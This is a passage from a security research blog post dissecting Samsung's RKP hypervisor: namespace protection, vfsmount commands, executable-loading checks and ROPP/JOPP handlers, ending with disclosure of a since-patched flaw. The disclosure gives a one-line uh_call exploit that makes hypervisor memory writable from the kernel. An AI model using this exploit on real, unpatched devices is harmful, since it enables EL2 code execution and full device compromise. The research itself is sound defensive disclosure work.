cmp_ns_integrity retrieves the nsproxy structure (that contains pointers to all per-process namespaces) for the current task, the mnt_namespace from it, and the root mount from this structure. The integrity verification is then performed by checking if the back-pointer of the vfsmount structure points to the mount structure.

extern u8 ns_prot;
unsigned int cmp_ns_integrity(void)
{
    struct mount *root = NULL;
    struct nsproxy *nsp = NULL;
    int ret = 0;

    if((in_interrupt()
         || in_softirq())){
        return 0;
    }
    nsp = current->nsproxy;
    if(!ns_prot || !nsp ||
        !nsp->mnt_ns) {
        return 0;
    }
    root = current->nsproxy->mnt_ns->root;
    if(root != root->mnt->bp_mount){
        printk("\n RKP44_3 Name Space Mismatch %p != %p\n nsp = %p mnt_ns %p\n",root,root->mnt->bp_mount,nsp,nsp->mnt_ns);
        ret = 1;
    }
    return ret;
}

Namespace Initialization

The vfsmount structures are allocated in the mnt_alloc_vfsmount function, using the read-only vfsmnt_cache cache. This function call rkp_init_ns to initialize the back-pointer.

static int mnt_alloc_vfsmount(struct mount *mnt)
{
    struct vfsmount *vfsmnt = NULL;

    vfsmnt = kmem_cache_alloc(vfsmnt_cache, GFP_KERNEL);
    if(!vfsmnt)
        return 1;

    spin_lock(&mnt_vfsmnt_lock);
    rkp_init_ns(vfsmnt,mnt);
//  vfsmnt->bp_mount = mnt;
    mnt->mnt = vfsmnt;
    spin_unlock(&mnt_vfsmnt_lock);
    return 0;
}

And rkp_init_ns simply invokes the RKP_KDP_X52 command, passing it the vfsmount and mount instances.

void rkp_init_ns(struct vfsmount *vfsmnt,struct mount *mnt)
{
    uh_call(UH_APP_RKP, RKP_KDP_X52, (u64)vfsmnt, (u64)mnt, 0, 0);
}

On the hypervisor side, the command is handled by the rkp_cmd_init_ns function, which calls rkp_init_ns_hyp. It calls chk_invalid_ns to verify that the new vfsmount structure is valid before memseting it and setting its back-pointer to the mount instance.

void rkp_init_ns_hyp(saved_regs_t* regs) {
  // ...

  // Convert the VA of the vfsmount structure into a PA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Reset all of its content.
    memset(vfsmnt, 0, rkp_cred->NS_SIZE);
    // Set the back-pointer to the mount structure given as argument.
    *(vfsmnt + 8 * rkp_cred->BPMNT_VFSMNT_OFFSET) = regs->x3;
  }
}

chk_invalid_ns verifies that the new vfsmount instance is valid (aligned on the structure size) and is hypervisor-protected (marked as NS in the physmap).

int64_t chk_invalid_ns(uint64_t vfsmnt) {
  // The vfsmount instance must be aligned on the size of the structure.
  if (!vfsmnt || vfsmnt != vfsmnt / rkp_cred->NS_BUFF_SIZE * rkp_cred->NS_BUFF_SIZE) {
    return 1;
  }
  rkp_phys_map_lock(vfsmnt);
  // Ensure it is marked as `NS` in the physmap.
  if (!is_phys_map_ns(vfsmnt)) {
    uh_log('L', "rkp_kdp.c", 882, "Name space physmap verification failed !!!!! %lx", vfsmnt);
    rkp_phys_map_unlock(vfsmnt);
    return 1;
  }
  rkp_phys_map_unlock(vfsmnt);
  return 0;
}

Setting Fields

The vfsmount structure contains various fields that need to be changed at some point by the kernel. Similarly to other protected structures, it cannot do that by itself and needs to call into the hypervisor instead.

The table below lists, for each field, the kernel function invoking the command and the hypervisor function handling that command.

Field Kernel Function Hypervisor Function
mnt_root/mnt_sb rkp_set_mnt_root_sb rkp_cmd_ns_set_root_sb
mnt_flags rkp_assign_mnt_flags rkp_cmd_ns_set_flags
data rkp_set_data rkp_cmd_ns_set_data

The mnt_root field, a pointer to the root of the mounted tree, which is an instance of the dentry structure, and the mnt_sb field, a pointer to thesuper_block structure, are changed using the rkp_set_mnt_root_sb function, which invokes the RKP_KDP_X53 command.

void rkp_set_mnt_root_sb(struct vfsmount *mnt,  struct dentry *mnt_root,struct super_block *mnt_sb)
{
    uh_call(UH_APP_RKP, RKP_KDP_X53, (u64)mnt, (u64)mnt_root, (u64)mnt_sb, 0);
}

This command is handled by the rkp_cmd_ns_set_root_sb hypervisor function, which calls rkp_ns_set_root_sb. This function calls chk_invalid_ns to check the vfsmount integrity and sets its mnt_root and mnt_sb fields to the values provided as arguments.

void rkp_ns_set_root_sb(saved_regs_t* regs) {
  // ...

  // Convert the vfsmount structure PA into a VA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the mnt_root field of the vfsmount structure to the dentry instance.
    *vfsmnt = regs->x3;
    // Set the mnt_sb field of the vfsmount structure to the super_block instance.
    *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET) = regs->x4;
  }
}

The mnt_flags field, which contains flags such as MNT_NOSUID, MNT_NODEV, MNT_NOEXEC, etc. is changed using the rkp_assign_mnt_flags function, which invokes the RKP_KDP_X54 command.

void rkp_assign_mnt_flags(struct vfsmount *mnt,int flags)
{
    uh_call(UH_APP_RKP, RKP_KDP_X54, (u64)mnt, (u64)flags, 0, 0);
}

Two other functions call rkp_assign_mnt_flags. The first one, rkp_set_mnt_flags, is used to set one or more flags.

void rkp_set_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f |= flags;
    rkp_assign_mnt_flags(mnt,f);
}

Unsurprisingly, the second one, rkp_reset_mnt_flags, is used to unset one or more flags.

void rkp_reset_mnt_flags(struct vfsmount *mnt,int flags)
{
    int f = mnt->mnt_flags;
    f &= ~flags;
    rkp_assign_mnt_flags(mnt,f);
}

This command is handled by the rkp_cmd_ns_set_flags hypervisor function, which calls rkp_ns_set_flags. This function calls chk_invalid_ns to check the vfsmount integrity and sets its flags field to the value provided as an argument.

void rkp_ns_set_flags(saved_regs_t* regs) {
  // ...

  // Convert the vfsmount structure PA into a VA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the flags field of the vfsmount structure.
    *(vfsmnt + 4 * rkp_cred->FLAGS_VFSMNT_OFFSET) = regs->x3;
  }
}

The data field, which contains type-specific data, is changed using the rkp_set_data function, which invokes the RKP_KDP_X55 command.

void rkp_set_data(struct vfsmount *mnt,void *data)
{
    uh_call(UH_APP_RKP, RKP_KDP_X55, (u64)mnt, (u64)data, 0, 0);
}

This command is handled by the rkp_cmd_ns_set_data hypervisor function, which calls rkp_ns_set_data. This function calls chk_invalid_ns to check the vfsmount integrity, and sets its data field to the value provided as an argument.

void rkp_ns_set_data(saved_regs_t* regs) {
  // ...

  // Convert the vfsmount structure PA into a VA.
  vfsmnt = rkp_get_pa(regs->x2);
  // Ensure the structure is valid and hypervisor-protected.
  if (!chk_invalid_ns(vfsmnt)) {
    // Set the data field of the vfsmount structure.
    *(vfsmnt + 8 * rkp_cred->DATA_VFSMNT_OFFSET) = regs->x3;
  }
}

New Mount

The last command that is called as part of the namespace protection feature is the command RKP_KDP_X56. It is called when a new mount is being created, by the rkp_populate_sb function. This function checks the path of the mount point against the list below, then calls the hypervisor if it is one of the specific paths.

  • /root
  • /product
  • /system
  • /vendor
  • /apex/com.android.runtime
  • /com.android.runtime@1
int art_count = 0;

static void rkp_populate_sb(char *mount_point, struct vfsmount *mnt) 
{
    if (!mount_point || !mnt)
        return;

    if (!odm_sb &&
        !strncmp(mount_point, KDP_MOUNT_PRODUCT, KDP_MOUNT_PRODUCT_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&odm_sb, (u64)mnt, KDP_SB_ODM, 0);
    } else if (!rootfs_sb &&
        !strncmp(mount_point, KDP_MOUNT_ROOTFS, KDP_MOUNT_ROOTFS_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&rootfs_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!sys_sb &&
        !strncmp(mount_point, KDP_MOUNT_SYSTEM, KDP_MOUNT_SYSTEM_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&sys_sb, (u64)mnt, KDP_SB_SYS, 0);
    } else if (!vendor_sb &&
        !strncmp(mount_point, KDP_MOUNT_VENDOR, KDP_MOUNT_VENDOR_LEN)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&vendor_sb, (u64)mnt, KDP_SB_VENDOR, 0);
    } else if (!art_sb &&
        !strncmp(mount_point, KDP_MOUNT_ART, KDP_MOUNT_ART_LEN - 1)) {
        uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
    } else if ((art_count < ART_ALLOW) &&
        !strncmp(mount_point, KDP_MOUNT_ART2, KDP_MOUNT_ART2_LEN - 1)) {
        if (art_count)
            uh_call(UH_APP_RKP, RKP_KDP_X56, (u64)&art_sb, (u64)mnt, KDP_SB_ART, 0);
        art_count++;
    }
}

rkp_populate_sb is called from do_new_mount, which itself is called from do_mount.

static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
            int mnt_flags, const char *name, void *data)
{
    // ...
    buf = kzalloc(PATH_MAX, GFP_KERNEL);
    if (!buf){
        kfree(buf);
        return -ENOMEM;
    }
    dir_name = dentry_path_raw(path->dentry, buf, PATH_MAX);

    if(!sys_sb || !odm_sb || !vendor_sb || !rootfs_sb || !art_sb || (art_count < ART_ALLOW)) 
        rkp_populate_sb(dir_name,mnt);

    kfree(buf);
    // ...
}

On the hypervisor side, the command is handled by rkp_cmd_ns_set_sys_vfsmnt, which calls rkp_ns_set_sys_vfsmnt. It ensures the vfsmount structure given as an argument is valid by calling chk_invalid_ns. It then copies its mnt_sb field, the pointer to the superblock of the source file system mount, into the destination superblock pointer before storing this value again in one of the fields of the rkp_cred structure.

void* rkp_ns_set_sys_vfsmnt(saved_regs_t* regs) {
  // ...

  // If the `rkp_cred` structure is not initialized, i.e. `rkp_cred_init` has not been called.
  if (!rkp_cred) {
    uh_log('W', "rkp_kdp.c", 931, "RKP_ae6cae81");
    return;
  }
  // Convert the destination superblock VA to a PA.
  dst_sb = rkp_get_pa(regs->x2);
  // Convert the source file system mount VA to a PA.
  vfsmnt = rkp_get_pa(regs->x3);
  // Get the enum value indicating which mount point this is.
  mount_point = regs->x4;
  // Ensure the vfsmnt structure is valid and hypervisor-protected.
  if (!vfsmnt || chk_invalid_ns(vfsmnt) || mount_point >= KDP_SB_MAX) {
    uh_log('L', "rkp_kdp.c", 945, "Invalid  source vfsmnt  %lx %lx %lx\n", regs->x3, vfsmnt, mount_point);
    return;
  }
  // Sanity-check: the destination superblock must not be NULL.
  if (!dst_sb) {
    uh_log('L', "rkp_kdp.c", 956, "dst_sb is NULL %lx %lx %lx\n", regs->x2, 0, regs->x3);
    return;
  }
  // Get the mnt_sb field (pointer to superblock) of the vfsmount structure.
  mnt_sb = *(vfsmnt + 8 * rkp_cred->SB_VFSMNT_OFFSET);
  // Set the pointer to the destination superblock to the mnt_sb field value.
  *dst_sb = mnt_sb;
  // Depending on the mount point, set the corresponding field of the `rkp_cred` structure.
  switch (mount_point) {
    case KDP_SB_ROOTFS:
      *rkp_cred->SB_ROOTFS = mnt_sb;
      break;
    case KDP_SB_ODM:
      *rkp_cred->SB_ODM = mnt_sb;
      break;
    case KDP_SB_SYS:
      *rkp_cred->SB_SYS = mnt_sb;
      break;
    case KDP_SB_VENDOR:
      *rkp_cred->SB_VENDOR = mnt_sb;
      break;
    case KDP_SB_ART:
      *rkp_cred->SB_ART = mnt_sb;
      break;
  }
}

Executable Loading

The mount namespace protection feature enables additional checking when executable binaries are loaded by the kernel. The verifications happen in the flush_old_exec function, which is called from the loaders of the supported binary formats (see this LWN.net article). This mechanism also prevents the abuse of the call_usermodehelper command that has been used in a previous Samsung RKP bypass.

If the current task is privileged, determined by calling is_rkp_priv_task, the flush_old_exec function will call invalid_drive to ensure the executable's mount point is valid. If it is not, it will make the kernel panic.

int flush_old_exec(struct linux_binprm * bprm)
{
    // ...
    if(rkp_cred_enable &&
        is_rkp_priv_task() && 
        invalid_drive(bprm)) {
        panic("\n KDP_NS_PROT: Illegal Execution of file #%s#\n", bprm->filename);
    }
    // ...
}

is_rkp_priv_task simply checks if any of the UID, EUID, GID, or EGID of the current task is below or equal to 1000 (SYSTEM).

#define RKP_CRED_SYS_ID 1000

static int is_rkp_priv_task(void)
{
    struct cred *cred = (struct cred *)current_cred();

    if(cred->uid.val <= (uid_t)RKP_CRED_SYS_ID || cred->euid.val <= (uid_t)RKP_CRED_SYS_ID ||
        cred->gid.val <= (gid_t)RKP_CRED_SYS_ID || cred->egid.val <= (gid_t)RKP_CRED_SYS_ID ){
        return 1;
    }
    return 0;
}

invalid_drive first retrieves the vfsmount structure from the file structure of the binary being loaded. It ensures it is hypervisor-protected by calling rkp_ro_page (though that doesn't mean it is necessarily of the expected type). If then passes its superblock to the kdp_check_sb_mismatch function to determine whether or not the mount point is valid.

static int invalid_drive(struct linux_binprm * bprm) 
{
    struct super_block *sb =  NULL;
    struct vfsmount *vfsmnt = NULL;

    vfsmnt = bprm->file->f_path.mnt;
    if(!vfsmnt || 
        !rkp_ro_page((unsigned long)vfsmnt)) {
        printk("\nInvalid Drive #%s# #%p#\n",bprm->filename, vfsmnt);
        return 1;
    } 
    sb = vfsmnt->mnt_sb;

    if(kdp_check_sb_mismatch(sb)) {
        printk("\n Superblock Mismatch #%s# vfsmnt #%p#sb #%p:%p:%p:%p:%p:%p#\n",
                    bprm->filename, vfsmnt, sb, rootfs_sb, sys_sb, odm_sb, vendor_sb, art_sb);
        return 1;
    }

    return 0;
}

kdp_check_sb_mismatch, if the device is not in recovery and not unlocked, compares the superblock to the allowed ones, i.e. /root, /system, /product, /vendor, and /apex/com.android.runtime.

static int kdp_check_sb_mismatch(struct super_block *sb) 
{   
    if(is_recovery || __check_verifiedboot) {
        return 0;
    }
    if((sb != rootfs_sb) && (sb != sys_sb)
        && (sb != odm_sb) && (sb != vendor_sb) && (sb != art_sb)) {
        return 1;
    }
    return 0;
}

JOPP and ROPP Commands

We explained in the section about Kernel Exploitation that JOPP is only enabled on the high-end Samsung devices and ROPP on the high-end Snapdragon devices. For this subsection about the hypervisor commands related to these features, we will be looking at the kernel source code and RKP binary for a Snapdragon device (the US version of the S10).

We believe the initialization commands of JOPP and ROPP in the hypervisor, rkp_cmd_jopp_init and rkp_cmd_ropp_init, respectively, are called by the bootloader (S-Boot), though we couldn't confirm it.

The first command handler, rkp_cmd_jopp_init, does nothing interesting.

int64_t rkp_cmd_jopp_init() {
  uh_log('L', "rkp.c", 502, "CFP JOPP Enabled");
  return 0;
}

The second command handler, rkp_cmd_ropp_init, expects an argument structure that needs to start with a magic value (0x4A4C4955). This structure is copied to the fixed physical address (0xB0240020). If the memory at another physical address (0x80001000) matches another magic value (0xCDEFCDEF), the structure is copied again at a last physical address (0x80001020).

int64_t rkp_cmd_ropp_init(saved_regs_t* regs) {
  // ...

  // Convert the argument structure VA to a PA.
  arg_struct = virt_to_phys_el1(regs->x2);
  // Check if it begins with the expected magic value.
  if (*arg_struct == 0x4a4c4955) {
    // Copy the structure to a fixed physical address.
    memcpy(0xb0240020, arg_struct, 80);
    // If the memory at another PA contains another magic value.
    if (*(uint32_t*)0x80001000 == 0xcdefcdef) {
      // Copy the structure to another fixed PA.
      memcpy(0x80001020, arg_struct, 80);
    }
    uh_log('L', "rkp.c", 529, "CFP ROPP Enabled");
  } else {
    uh_log('W', "rkp.c", 515, "RKP_e08bc280");
  }
  return 0;
}

In addition, ROPP uses two more commands, rkp_cmd_ropp_save and rkp_cmd_ropp_reload, that deal with the "master key".

rkp_cmd_ropp_save does nothing and is probably called by the bootloader, but we again couldn't confirm it.

int64_t rkp_cmd_ropp_save() {
  return 0;
}

rkp_cmd_ropp_reload is called by the kernel in the ropp_secondary_init assembly macro.

/*
 * secondary core will start a forked thread, so rrk is already enc'ed
 * so only need to reload the master key and thread key
 */
    .macro ropp_secondary_init ti
    reset_sysreg
    //load master key from rkp
    ropp_load_mk
    //load thread key
    ropp_load_key \ti
    .endm

    .macro ropp_load_mk
#ifdef CONFIG_UH
    push    x0, x1
    push    x2, x3
    push    x4, x5
    mov x1, #0x10 //RKP_ROPP_RELOAD
    mov x0, #0xc002 //UH_APP_RKP
    movk    x0, #0xc300, lsl #16
    smc #0x0
    pop x4, x5
    pop x2, x3
    pop x0, x1
#else
    push    x0, x1
    ldr x0, = ropp_master_key
    ldr x0, [x0]
    msr RRMK, x0
    pop x0, x1
#endif
    .endm

This macro is called from the __secondary_switched assembly function, which is executed when a secondary core is being booted.

__secondary_switched:
    // ...
    ropp_secondary_init x2
    // ...
ENDPROC(__secondary_switched)

The command handler itself, rkp_cmd_ropp_reload, sets the system register DBGBVR5_EL1 (that holds the RRMK, or "master key" used by the ROPP feature), to a value read from a fixed physical address (0xB0240028).

int64_t rkp_cmd_ropp_reload() {
  set_dbgbvr5_el1(*(uint32_t*)0xb0240028);
  return 0;
}

This completes our explanations about Samsung RKP's inner workings. We have detailed how the hypervisor is initialized, how it handles exceptions coming from lower ELs, and how it processes the kernel page tables — all of that to protect critical kernel data structures that might be targeted in an exploit.

Vulnerability

We will now a reveal a vulnerability that we have found, and that is now fixed, that allows getting code execution at EL2. We will exploit this vulnerability on our Exynos device, but it should also work on Snapdragon devices with some minor changes.

Here is some information about the binaries that we are looking at:

  • Exynos device - Samsung A51 (SM-A515F)
    • Firmware version: A515FXXU3BTF4
    • Hypervisor version: Feb 27 2020
  • Snapdragon device - Samsung Galaxy S10 (SM-G973U)
    • Firmware version: G973USQU4ETH7
    • Hypervisor version: Feb 25 2020

Description

If you have been paying close attention while reading this blog post, you might have noticed two important functions that we haven't detailed yet: uh_log and rkp_get_pa. Let's go over them now, starting with uh_log.

uh_log does some fairly standard string formatting and printing, that we have omitted from the snippet below, but it also does other things. If the log level that was given as the first argument is 'D' (debug), then it also calls uh_panic. This will become important in a moment...

int64_t uh_log(char level, const char* filename, uint32_t linenum, const char* message, ...) {
  // ...

  // ...
  if (level == 'D') {
    uh_panic();
  }
  return res;
}

Now we turn our attention to rkp_get_pa which is called by a lot of command handlers to convert kernel input. If the virtual address is in the fixmap, it calculates the physical address from the PHYS_OFFSET (start of the kernel physical memory). If it is not in the fixmap, it calls virt_to_phys_el1 to perform a hardware translation. If that hardware translation doesn't succeed, it calculates the physical address from the KIMAGE_VOFFSET (offset between kernel VAs and PAs). Finally, it calls check_kernel_input to check if that address can be used or not.

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...

  if (!vaddr) {
    return 0;
  }
  if (vaddr < 0xffffffc000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0) {
        paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
      } else {
        paddr = vaddr - KIMAGE_VOFFSET;
      }
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
  }
  check_kernel_input(paddr);
  return paddr;
}

virt_to_phys_el1 uses the AT S12E1R (stage 1 & 2 at EL1 read access) instruction to translate the virtual address. If that translation, simulating a kernel read access, fails, it uses the AT S12E1W (stage 1 & 2 at EL1 write access) instruction. If that translation, simulating a kernel write access, fails and the MMU is enabled, it will print the stack contents.

int64_t virt_to_phys_el1(int64_t vaddr) {
  // ...

  if (vaddr) {
    at_s12e1r(vaddr);
    par_el1 = get_par_el1();
    if ((par_el1 & 1) != 0) {
      at_s12e1w(vaddr);
      par_el1 = get_par_el1();
    }
    if ((par_el1 & 1) != 0) {
      if ((get_sctlr_el1() & 1) != 0) {
        uh_log('W', "general.c", 128, "%s: wrong address %p", "virt_to_phys_el1", vaddr);
        if (!has_printed_stack_contents) {
          has_printed_stack_contents = 1;
          print_stack_contents();
        }
        has_printed_stack_contents = 0;
      }
      vaddr = 0;
    } else {
      vaddr = par_el1 & 0xfffffffff000 | vaddr & 0xfff;
    }
  }
  return vaddr;
}

The check_kernel_input function returns if the kernel-provided VA, that has been converted into a PA, can be used safely. It only checks if the physical address is contained in the protected_ranges memlist. As stated in the Overall State After Startup section, this memlist contains after startup:

int64_t check_kernel_input(uint64_t paddr) {
  // ...

  res = protected_ranges_contains(paddr);
  if (res) {
    res = uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  }
  return res;
}

This should effectively prevent the kernel from giving an address that, once translated, falls into hypervisor memory. However, if the check fails, the uh_log function is called with an 'L' level and not a 'D' one, meaning that the hypervisor will not panic and execution will continue as if nothing ever happened. The impact of this simple mistake is huge: we can give addresses inside hypervisor memory to all command handlers.

Exploitation

Exploiting this vulnerability is trivial. It suffices to call one of the command handlers with the right arguments to immediately obtain an arbitrary write. For example, we can use the RKP_CMD_WRITE_PGT3 command, which is handled by the rkp_l3pgt_write function that we have seen earlier. It is only a matter of finding what to write and where to write it to compromise the hypervisor.

Below is our one-liner exploit that targets the stage 2 page tables of our device by adding a level 2 block descriptor that spans over the whole hypervisor memory. By setting the S2AP bit of the descriptor to 0b11, the memory mapping is writable, and because the WXN bit set in s1_enable only applies to the address translation at EL2 and not at EL1, we can now freely modify the hypervisor code from the kernel.

uh_call(UH_APP_RKP, RKP_CMD_WRITE_PGT3, 0xffffffc00702a1c0, 0x870004fd);

image

Patch

We noticed that binaries built after May 27 2020 include a patch for this vulnerability, but we don't know whether it was privately disclosed or found internally. It should have affected all devices with Exynos and Snapdragon chipsets.

Let's take a look at the latest firmware update available for our research device to see what the changes are. First, the check_kernel_input function. Interestingly, instead of simply changing the log level, they duplicated the call to uh_log. It's weird but at least it does the job.

int64_t check_kernel_input(uint64_t paddr) {
  // ...

  res = protected_ranges_contains(paddr);
  if (res) {
    uh_log('L', "pa_restrict.c", 94, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
    uh_log('D', "pa_restrict.c", 96, "Error kernel input falls into uH range, pa_from_kernel : %lx", paddr);
  }
  return res;
}

We also noticed while binary diffing that they added some extra checks in rkp_get_pa. They are now enforcing that the physical address be contained in the dynamic_regions memlist. Better be safe than sorry!

int64_t rkp_get_pa(uint64_t vaddr) {
  // ...

  if (!vaddr) {
    return 0;
  }
  if (vaddr < 0xffffffc000000000) {
    paddr = virt_to_phys_el1(vaddr);
    if (!paddr) {
      if ((vaddr & 0x4000000000) != 0) {
        paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
      } else {
        paddr = vaddr - KIMAGE_VOFFSET;
      }
    }
  } else {
    paddr = PHYS_OFFSET + (vaddr & 0x3fffffffff);
  }
  check_kernel_input(paddr);
  if (!memlist_contains_addr(&uh_state.dynamic_regions, paddr)) {
    uh_log('L', "rkp_paging.c", 70, "RKP_68592c58 %lx", paddr);
    uh_log('D', "rkp_paging.c", 71, "RKP_68592c58 %lx", paddr);
  }
  return paddr;
}

Conclusion

Let's recap the various protections offered by Samsung RKP:

  • the page tables cannot be modified directly by the kernel;
    • accesses to virtual memory system registers at EL1 are trapped;
    • page tables are set as read-only in the stage 2 address translation;
      • except for level 3 tables, but it that case the PXNTable bit is set;
  • double mappings are prevented, but the checking is only done by the kernel;
    • still can't make the kernel text read-write or a new region executable;
  • sensitive kernel global variables are moved in the .rodata region (read-only);
  • sensitive kernel data structures (cred, task_security_struct, vfsmount) are allocated on read-only pages because of the modifications made by Samsung to the SLUB allocator;
    • a various operations, the credentials of a running task are checked:
      • a task that was not system cannot suddenly become system or root;
      • it is possible to set the cred field of a task_struct
      • but the next operation, like executing a shell, will trigger a violation;
    • credentials are also reference-counted to prevent their reuse by another task;
  • it is not possible to execute a binary as root from outside of specific mount points;
  • on Snapdragon devices, ROPP (ROP prevention) is also enabled by RKP.

In this deep dive into Samsung RKP's internals, we have seen how a security hypervisor can help against kernel exploitation. Like other defense-in-depth measures, it makes it harder for an attacker who has gained read-write access to fully compromise the kernel. But this great engineering work doesn't prevent making (sometimes simple) mistakes in the implementation.

There are a lot more things about the hypervisor that we did not mention here but that deserve a follow-up blog post: unpatched vulnerabilities that we cannot talk about yet, explaining the differences between Exynos and Snapdragon implementations, digging into the new framework of the S20, etc.

References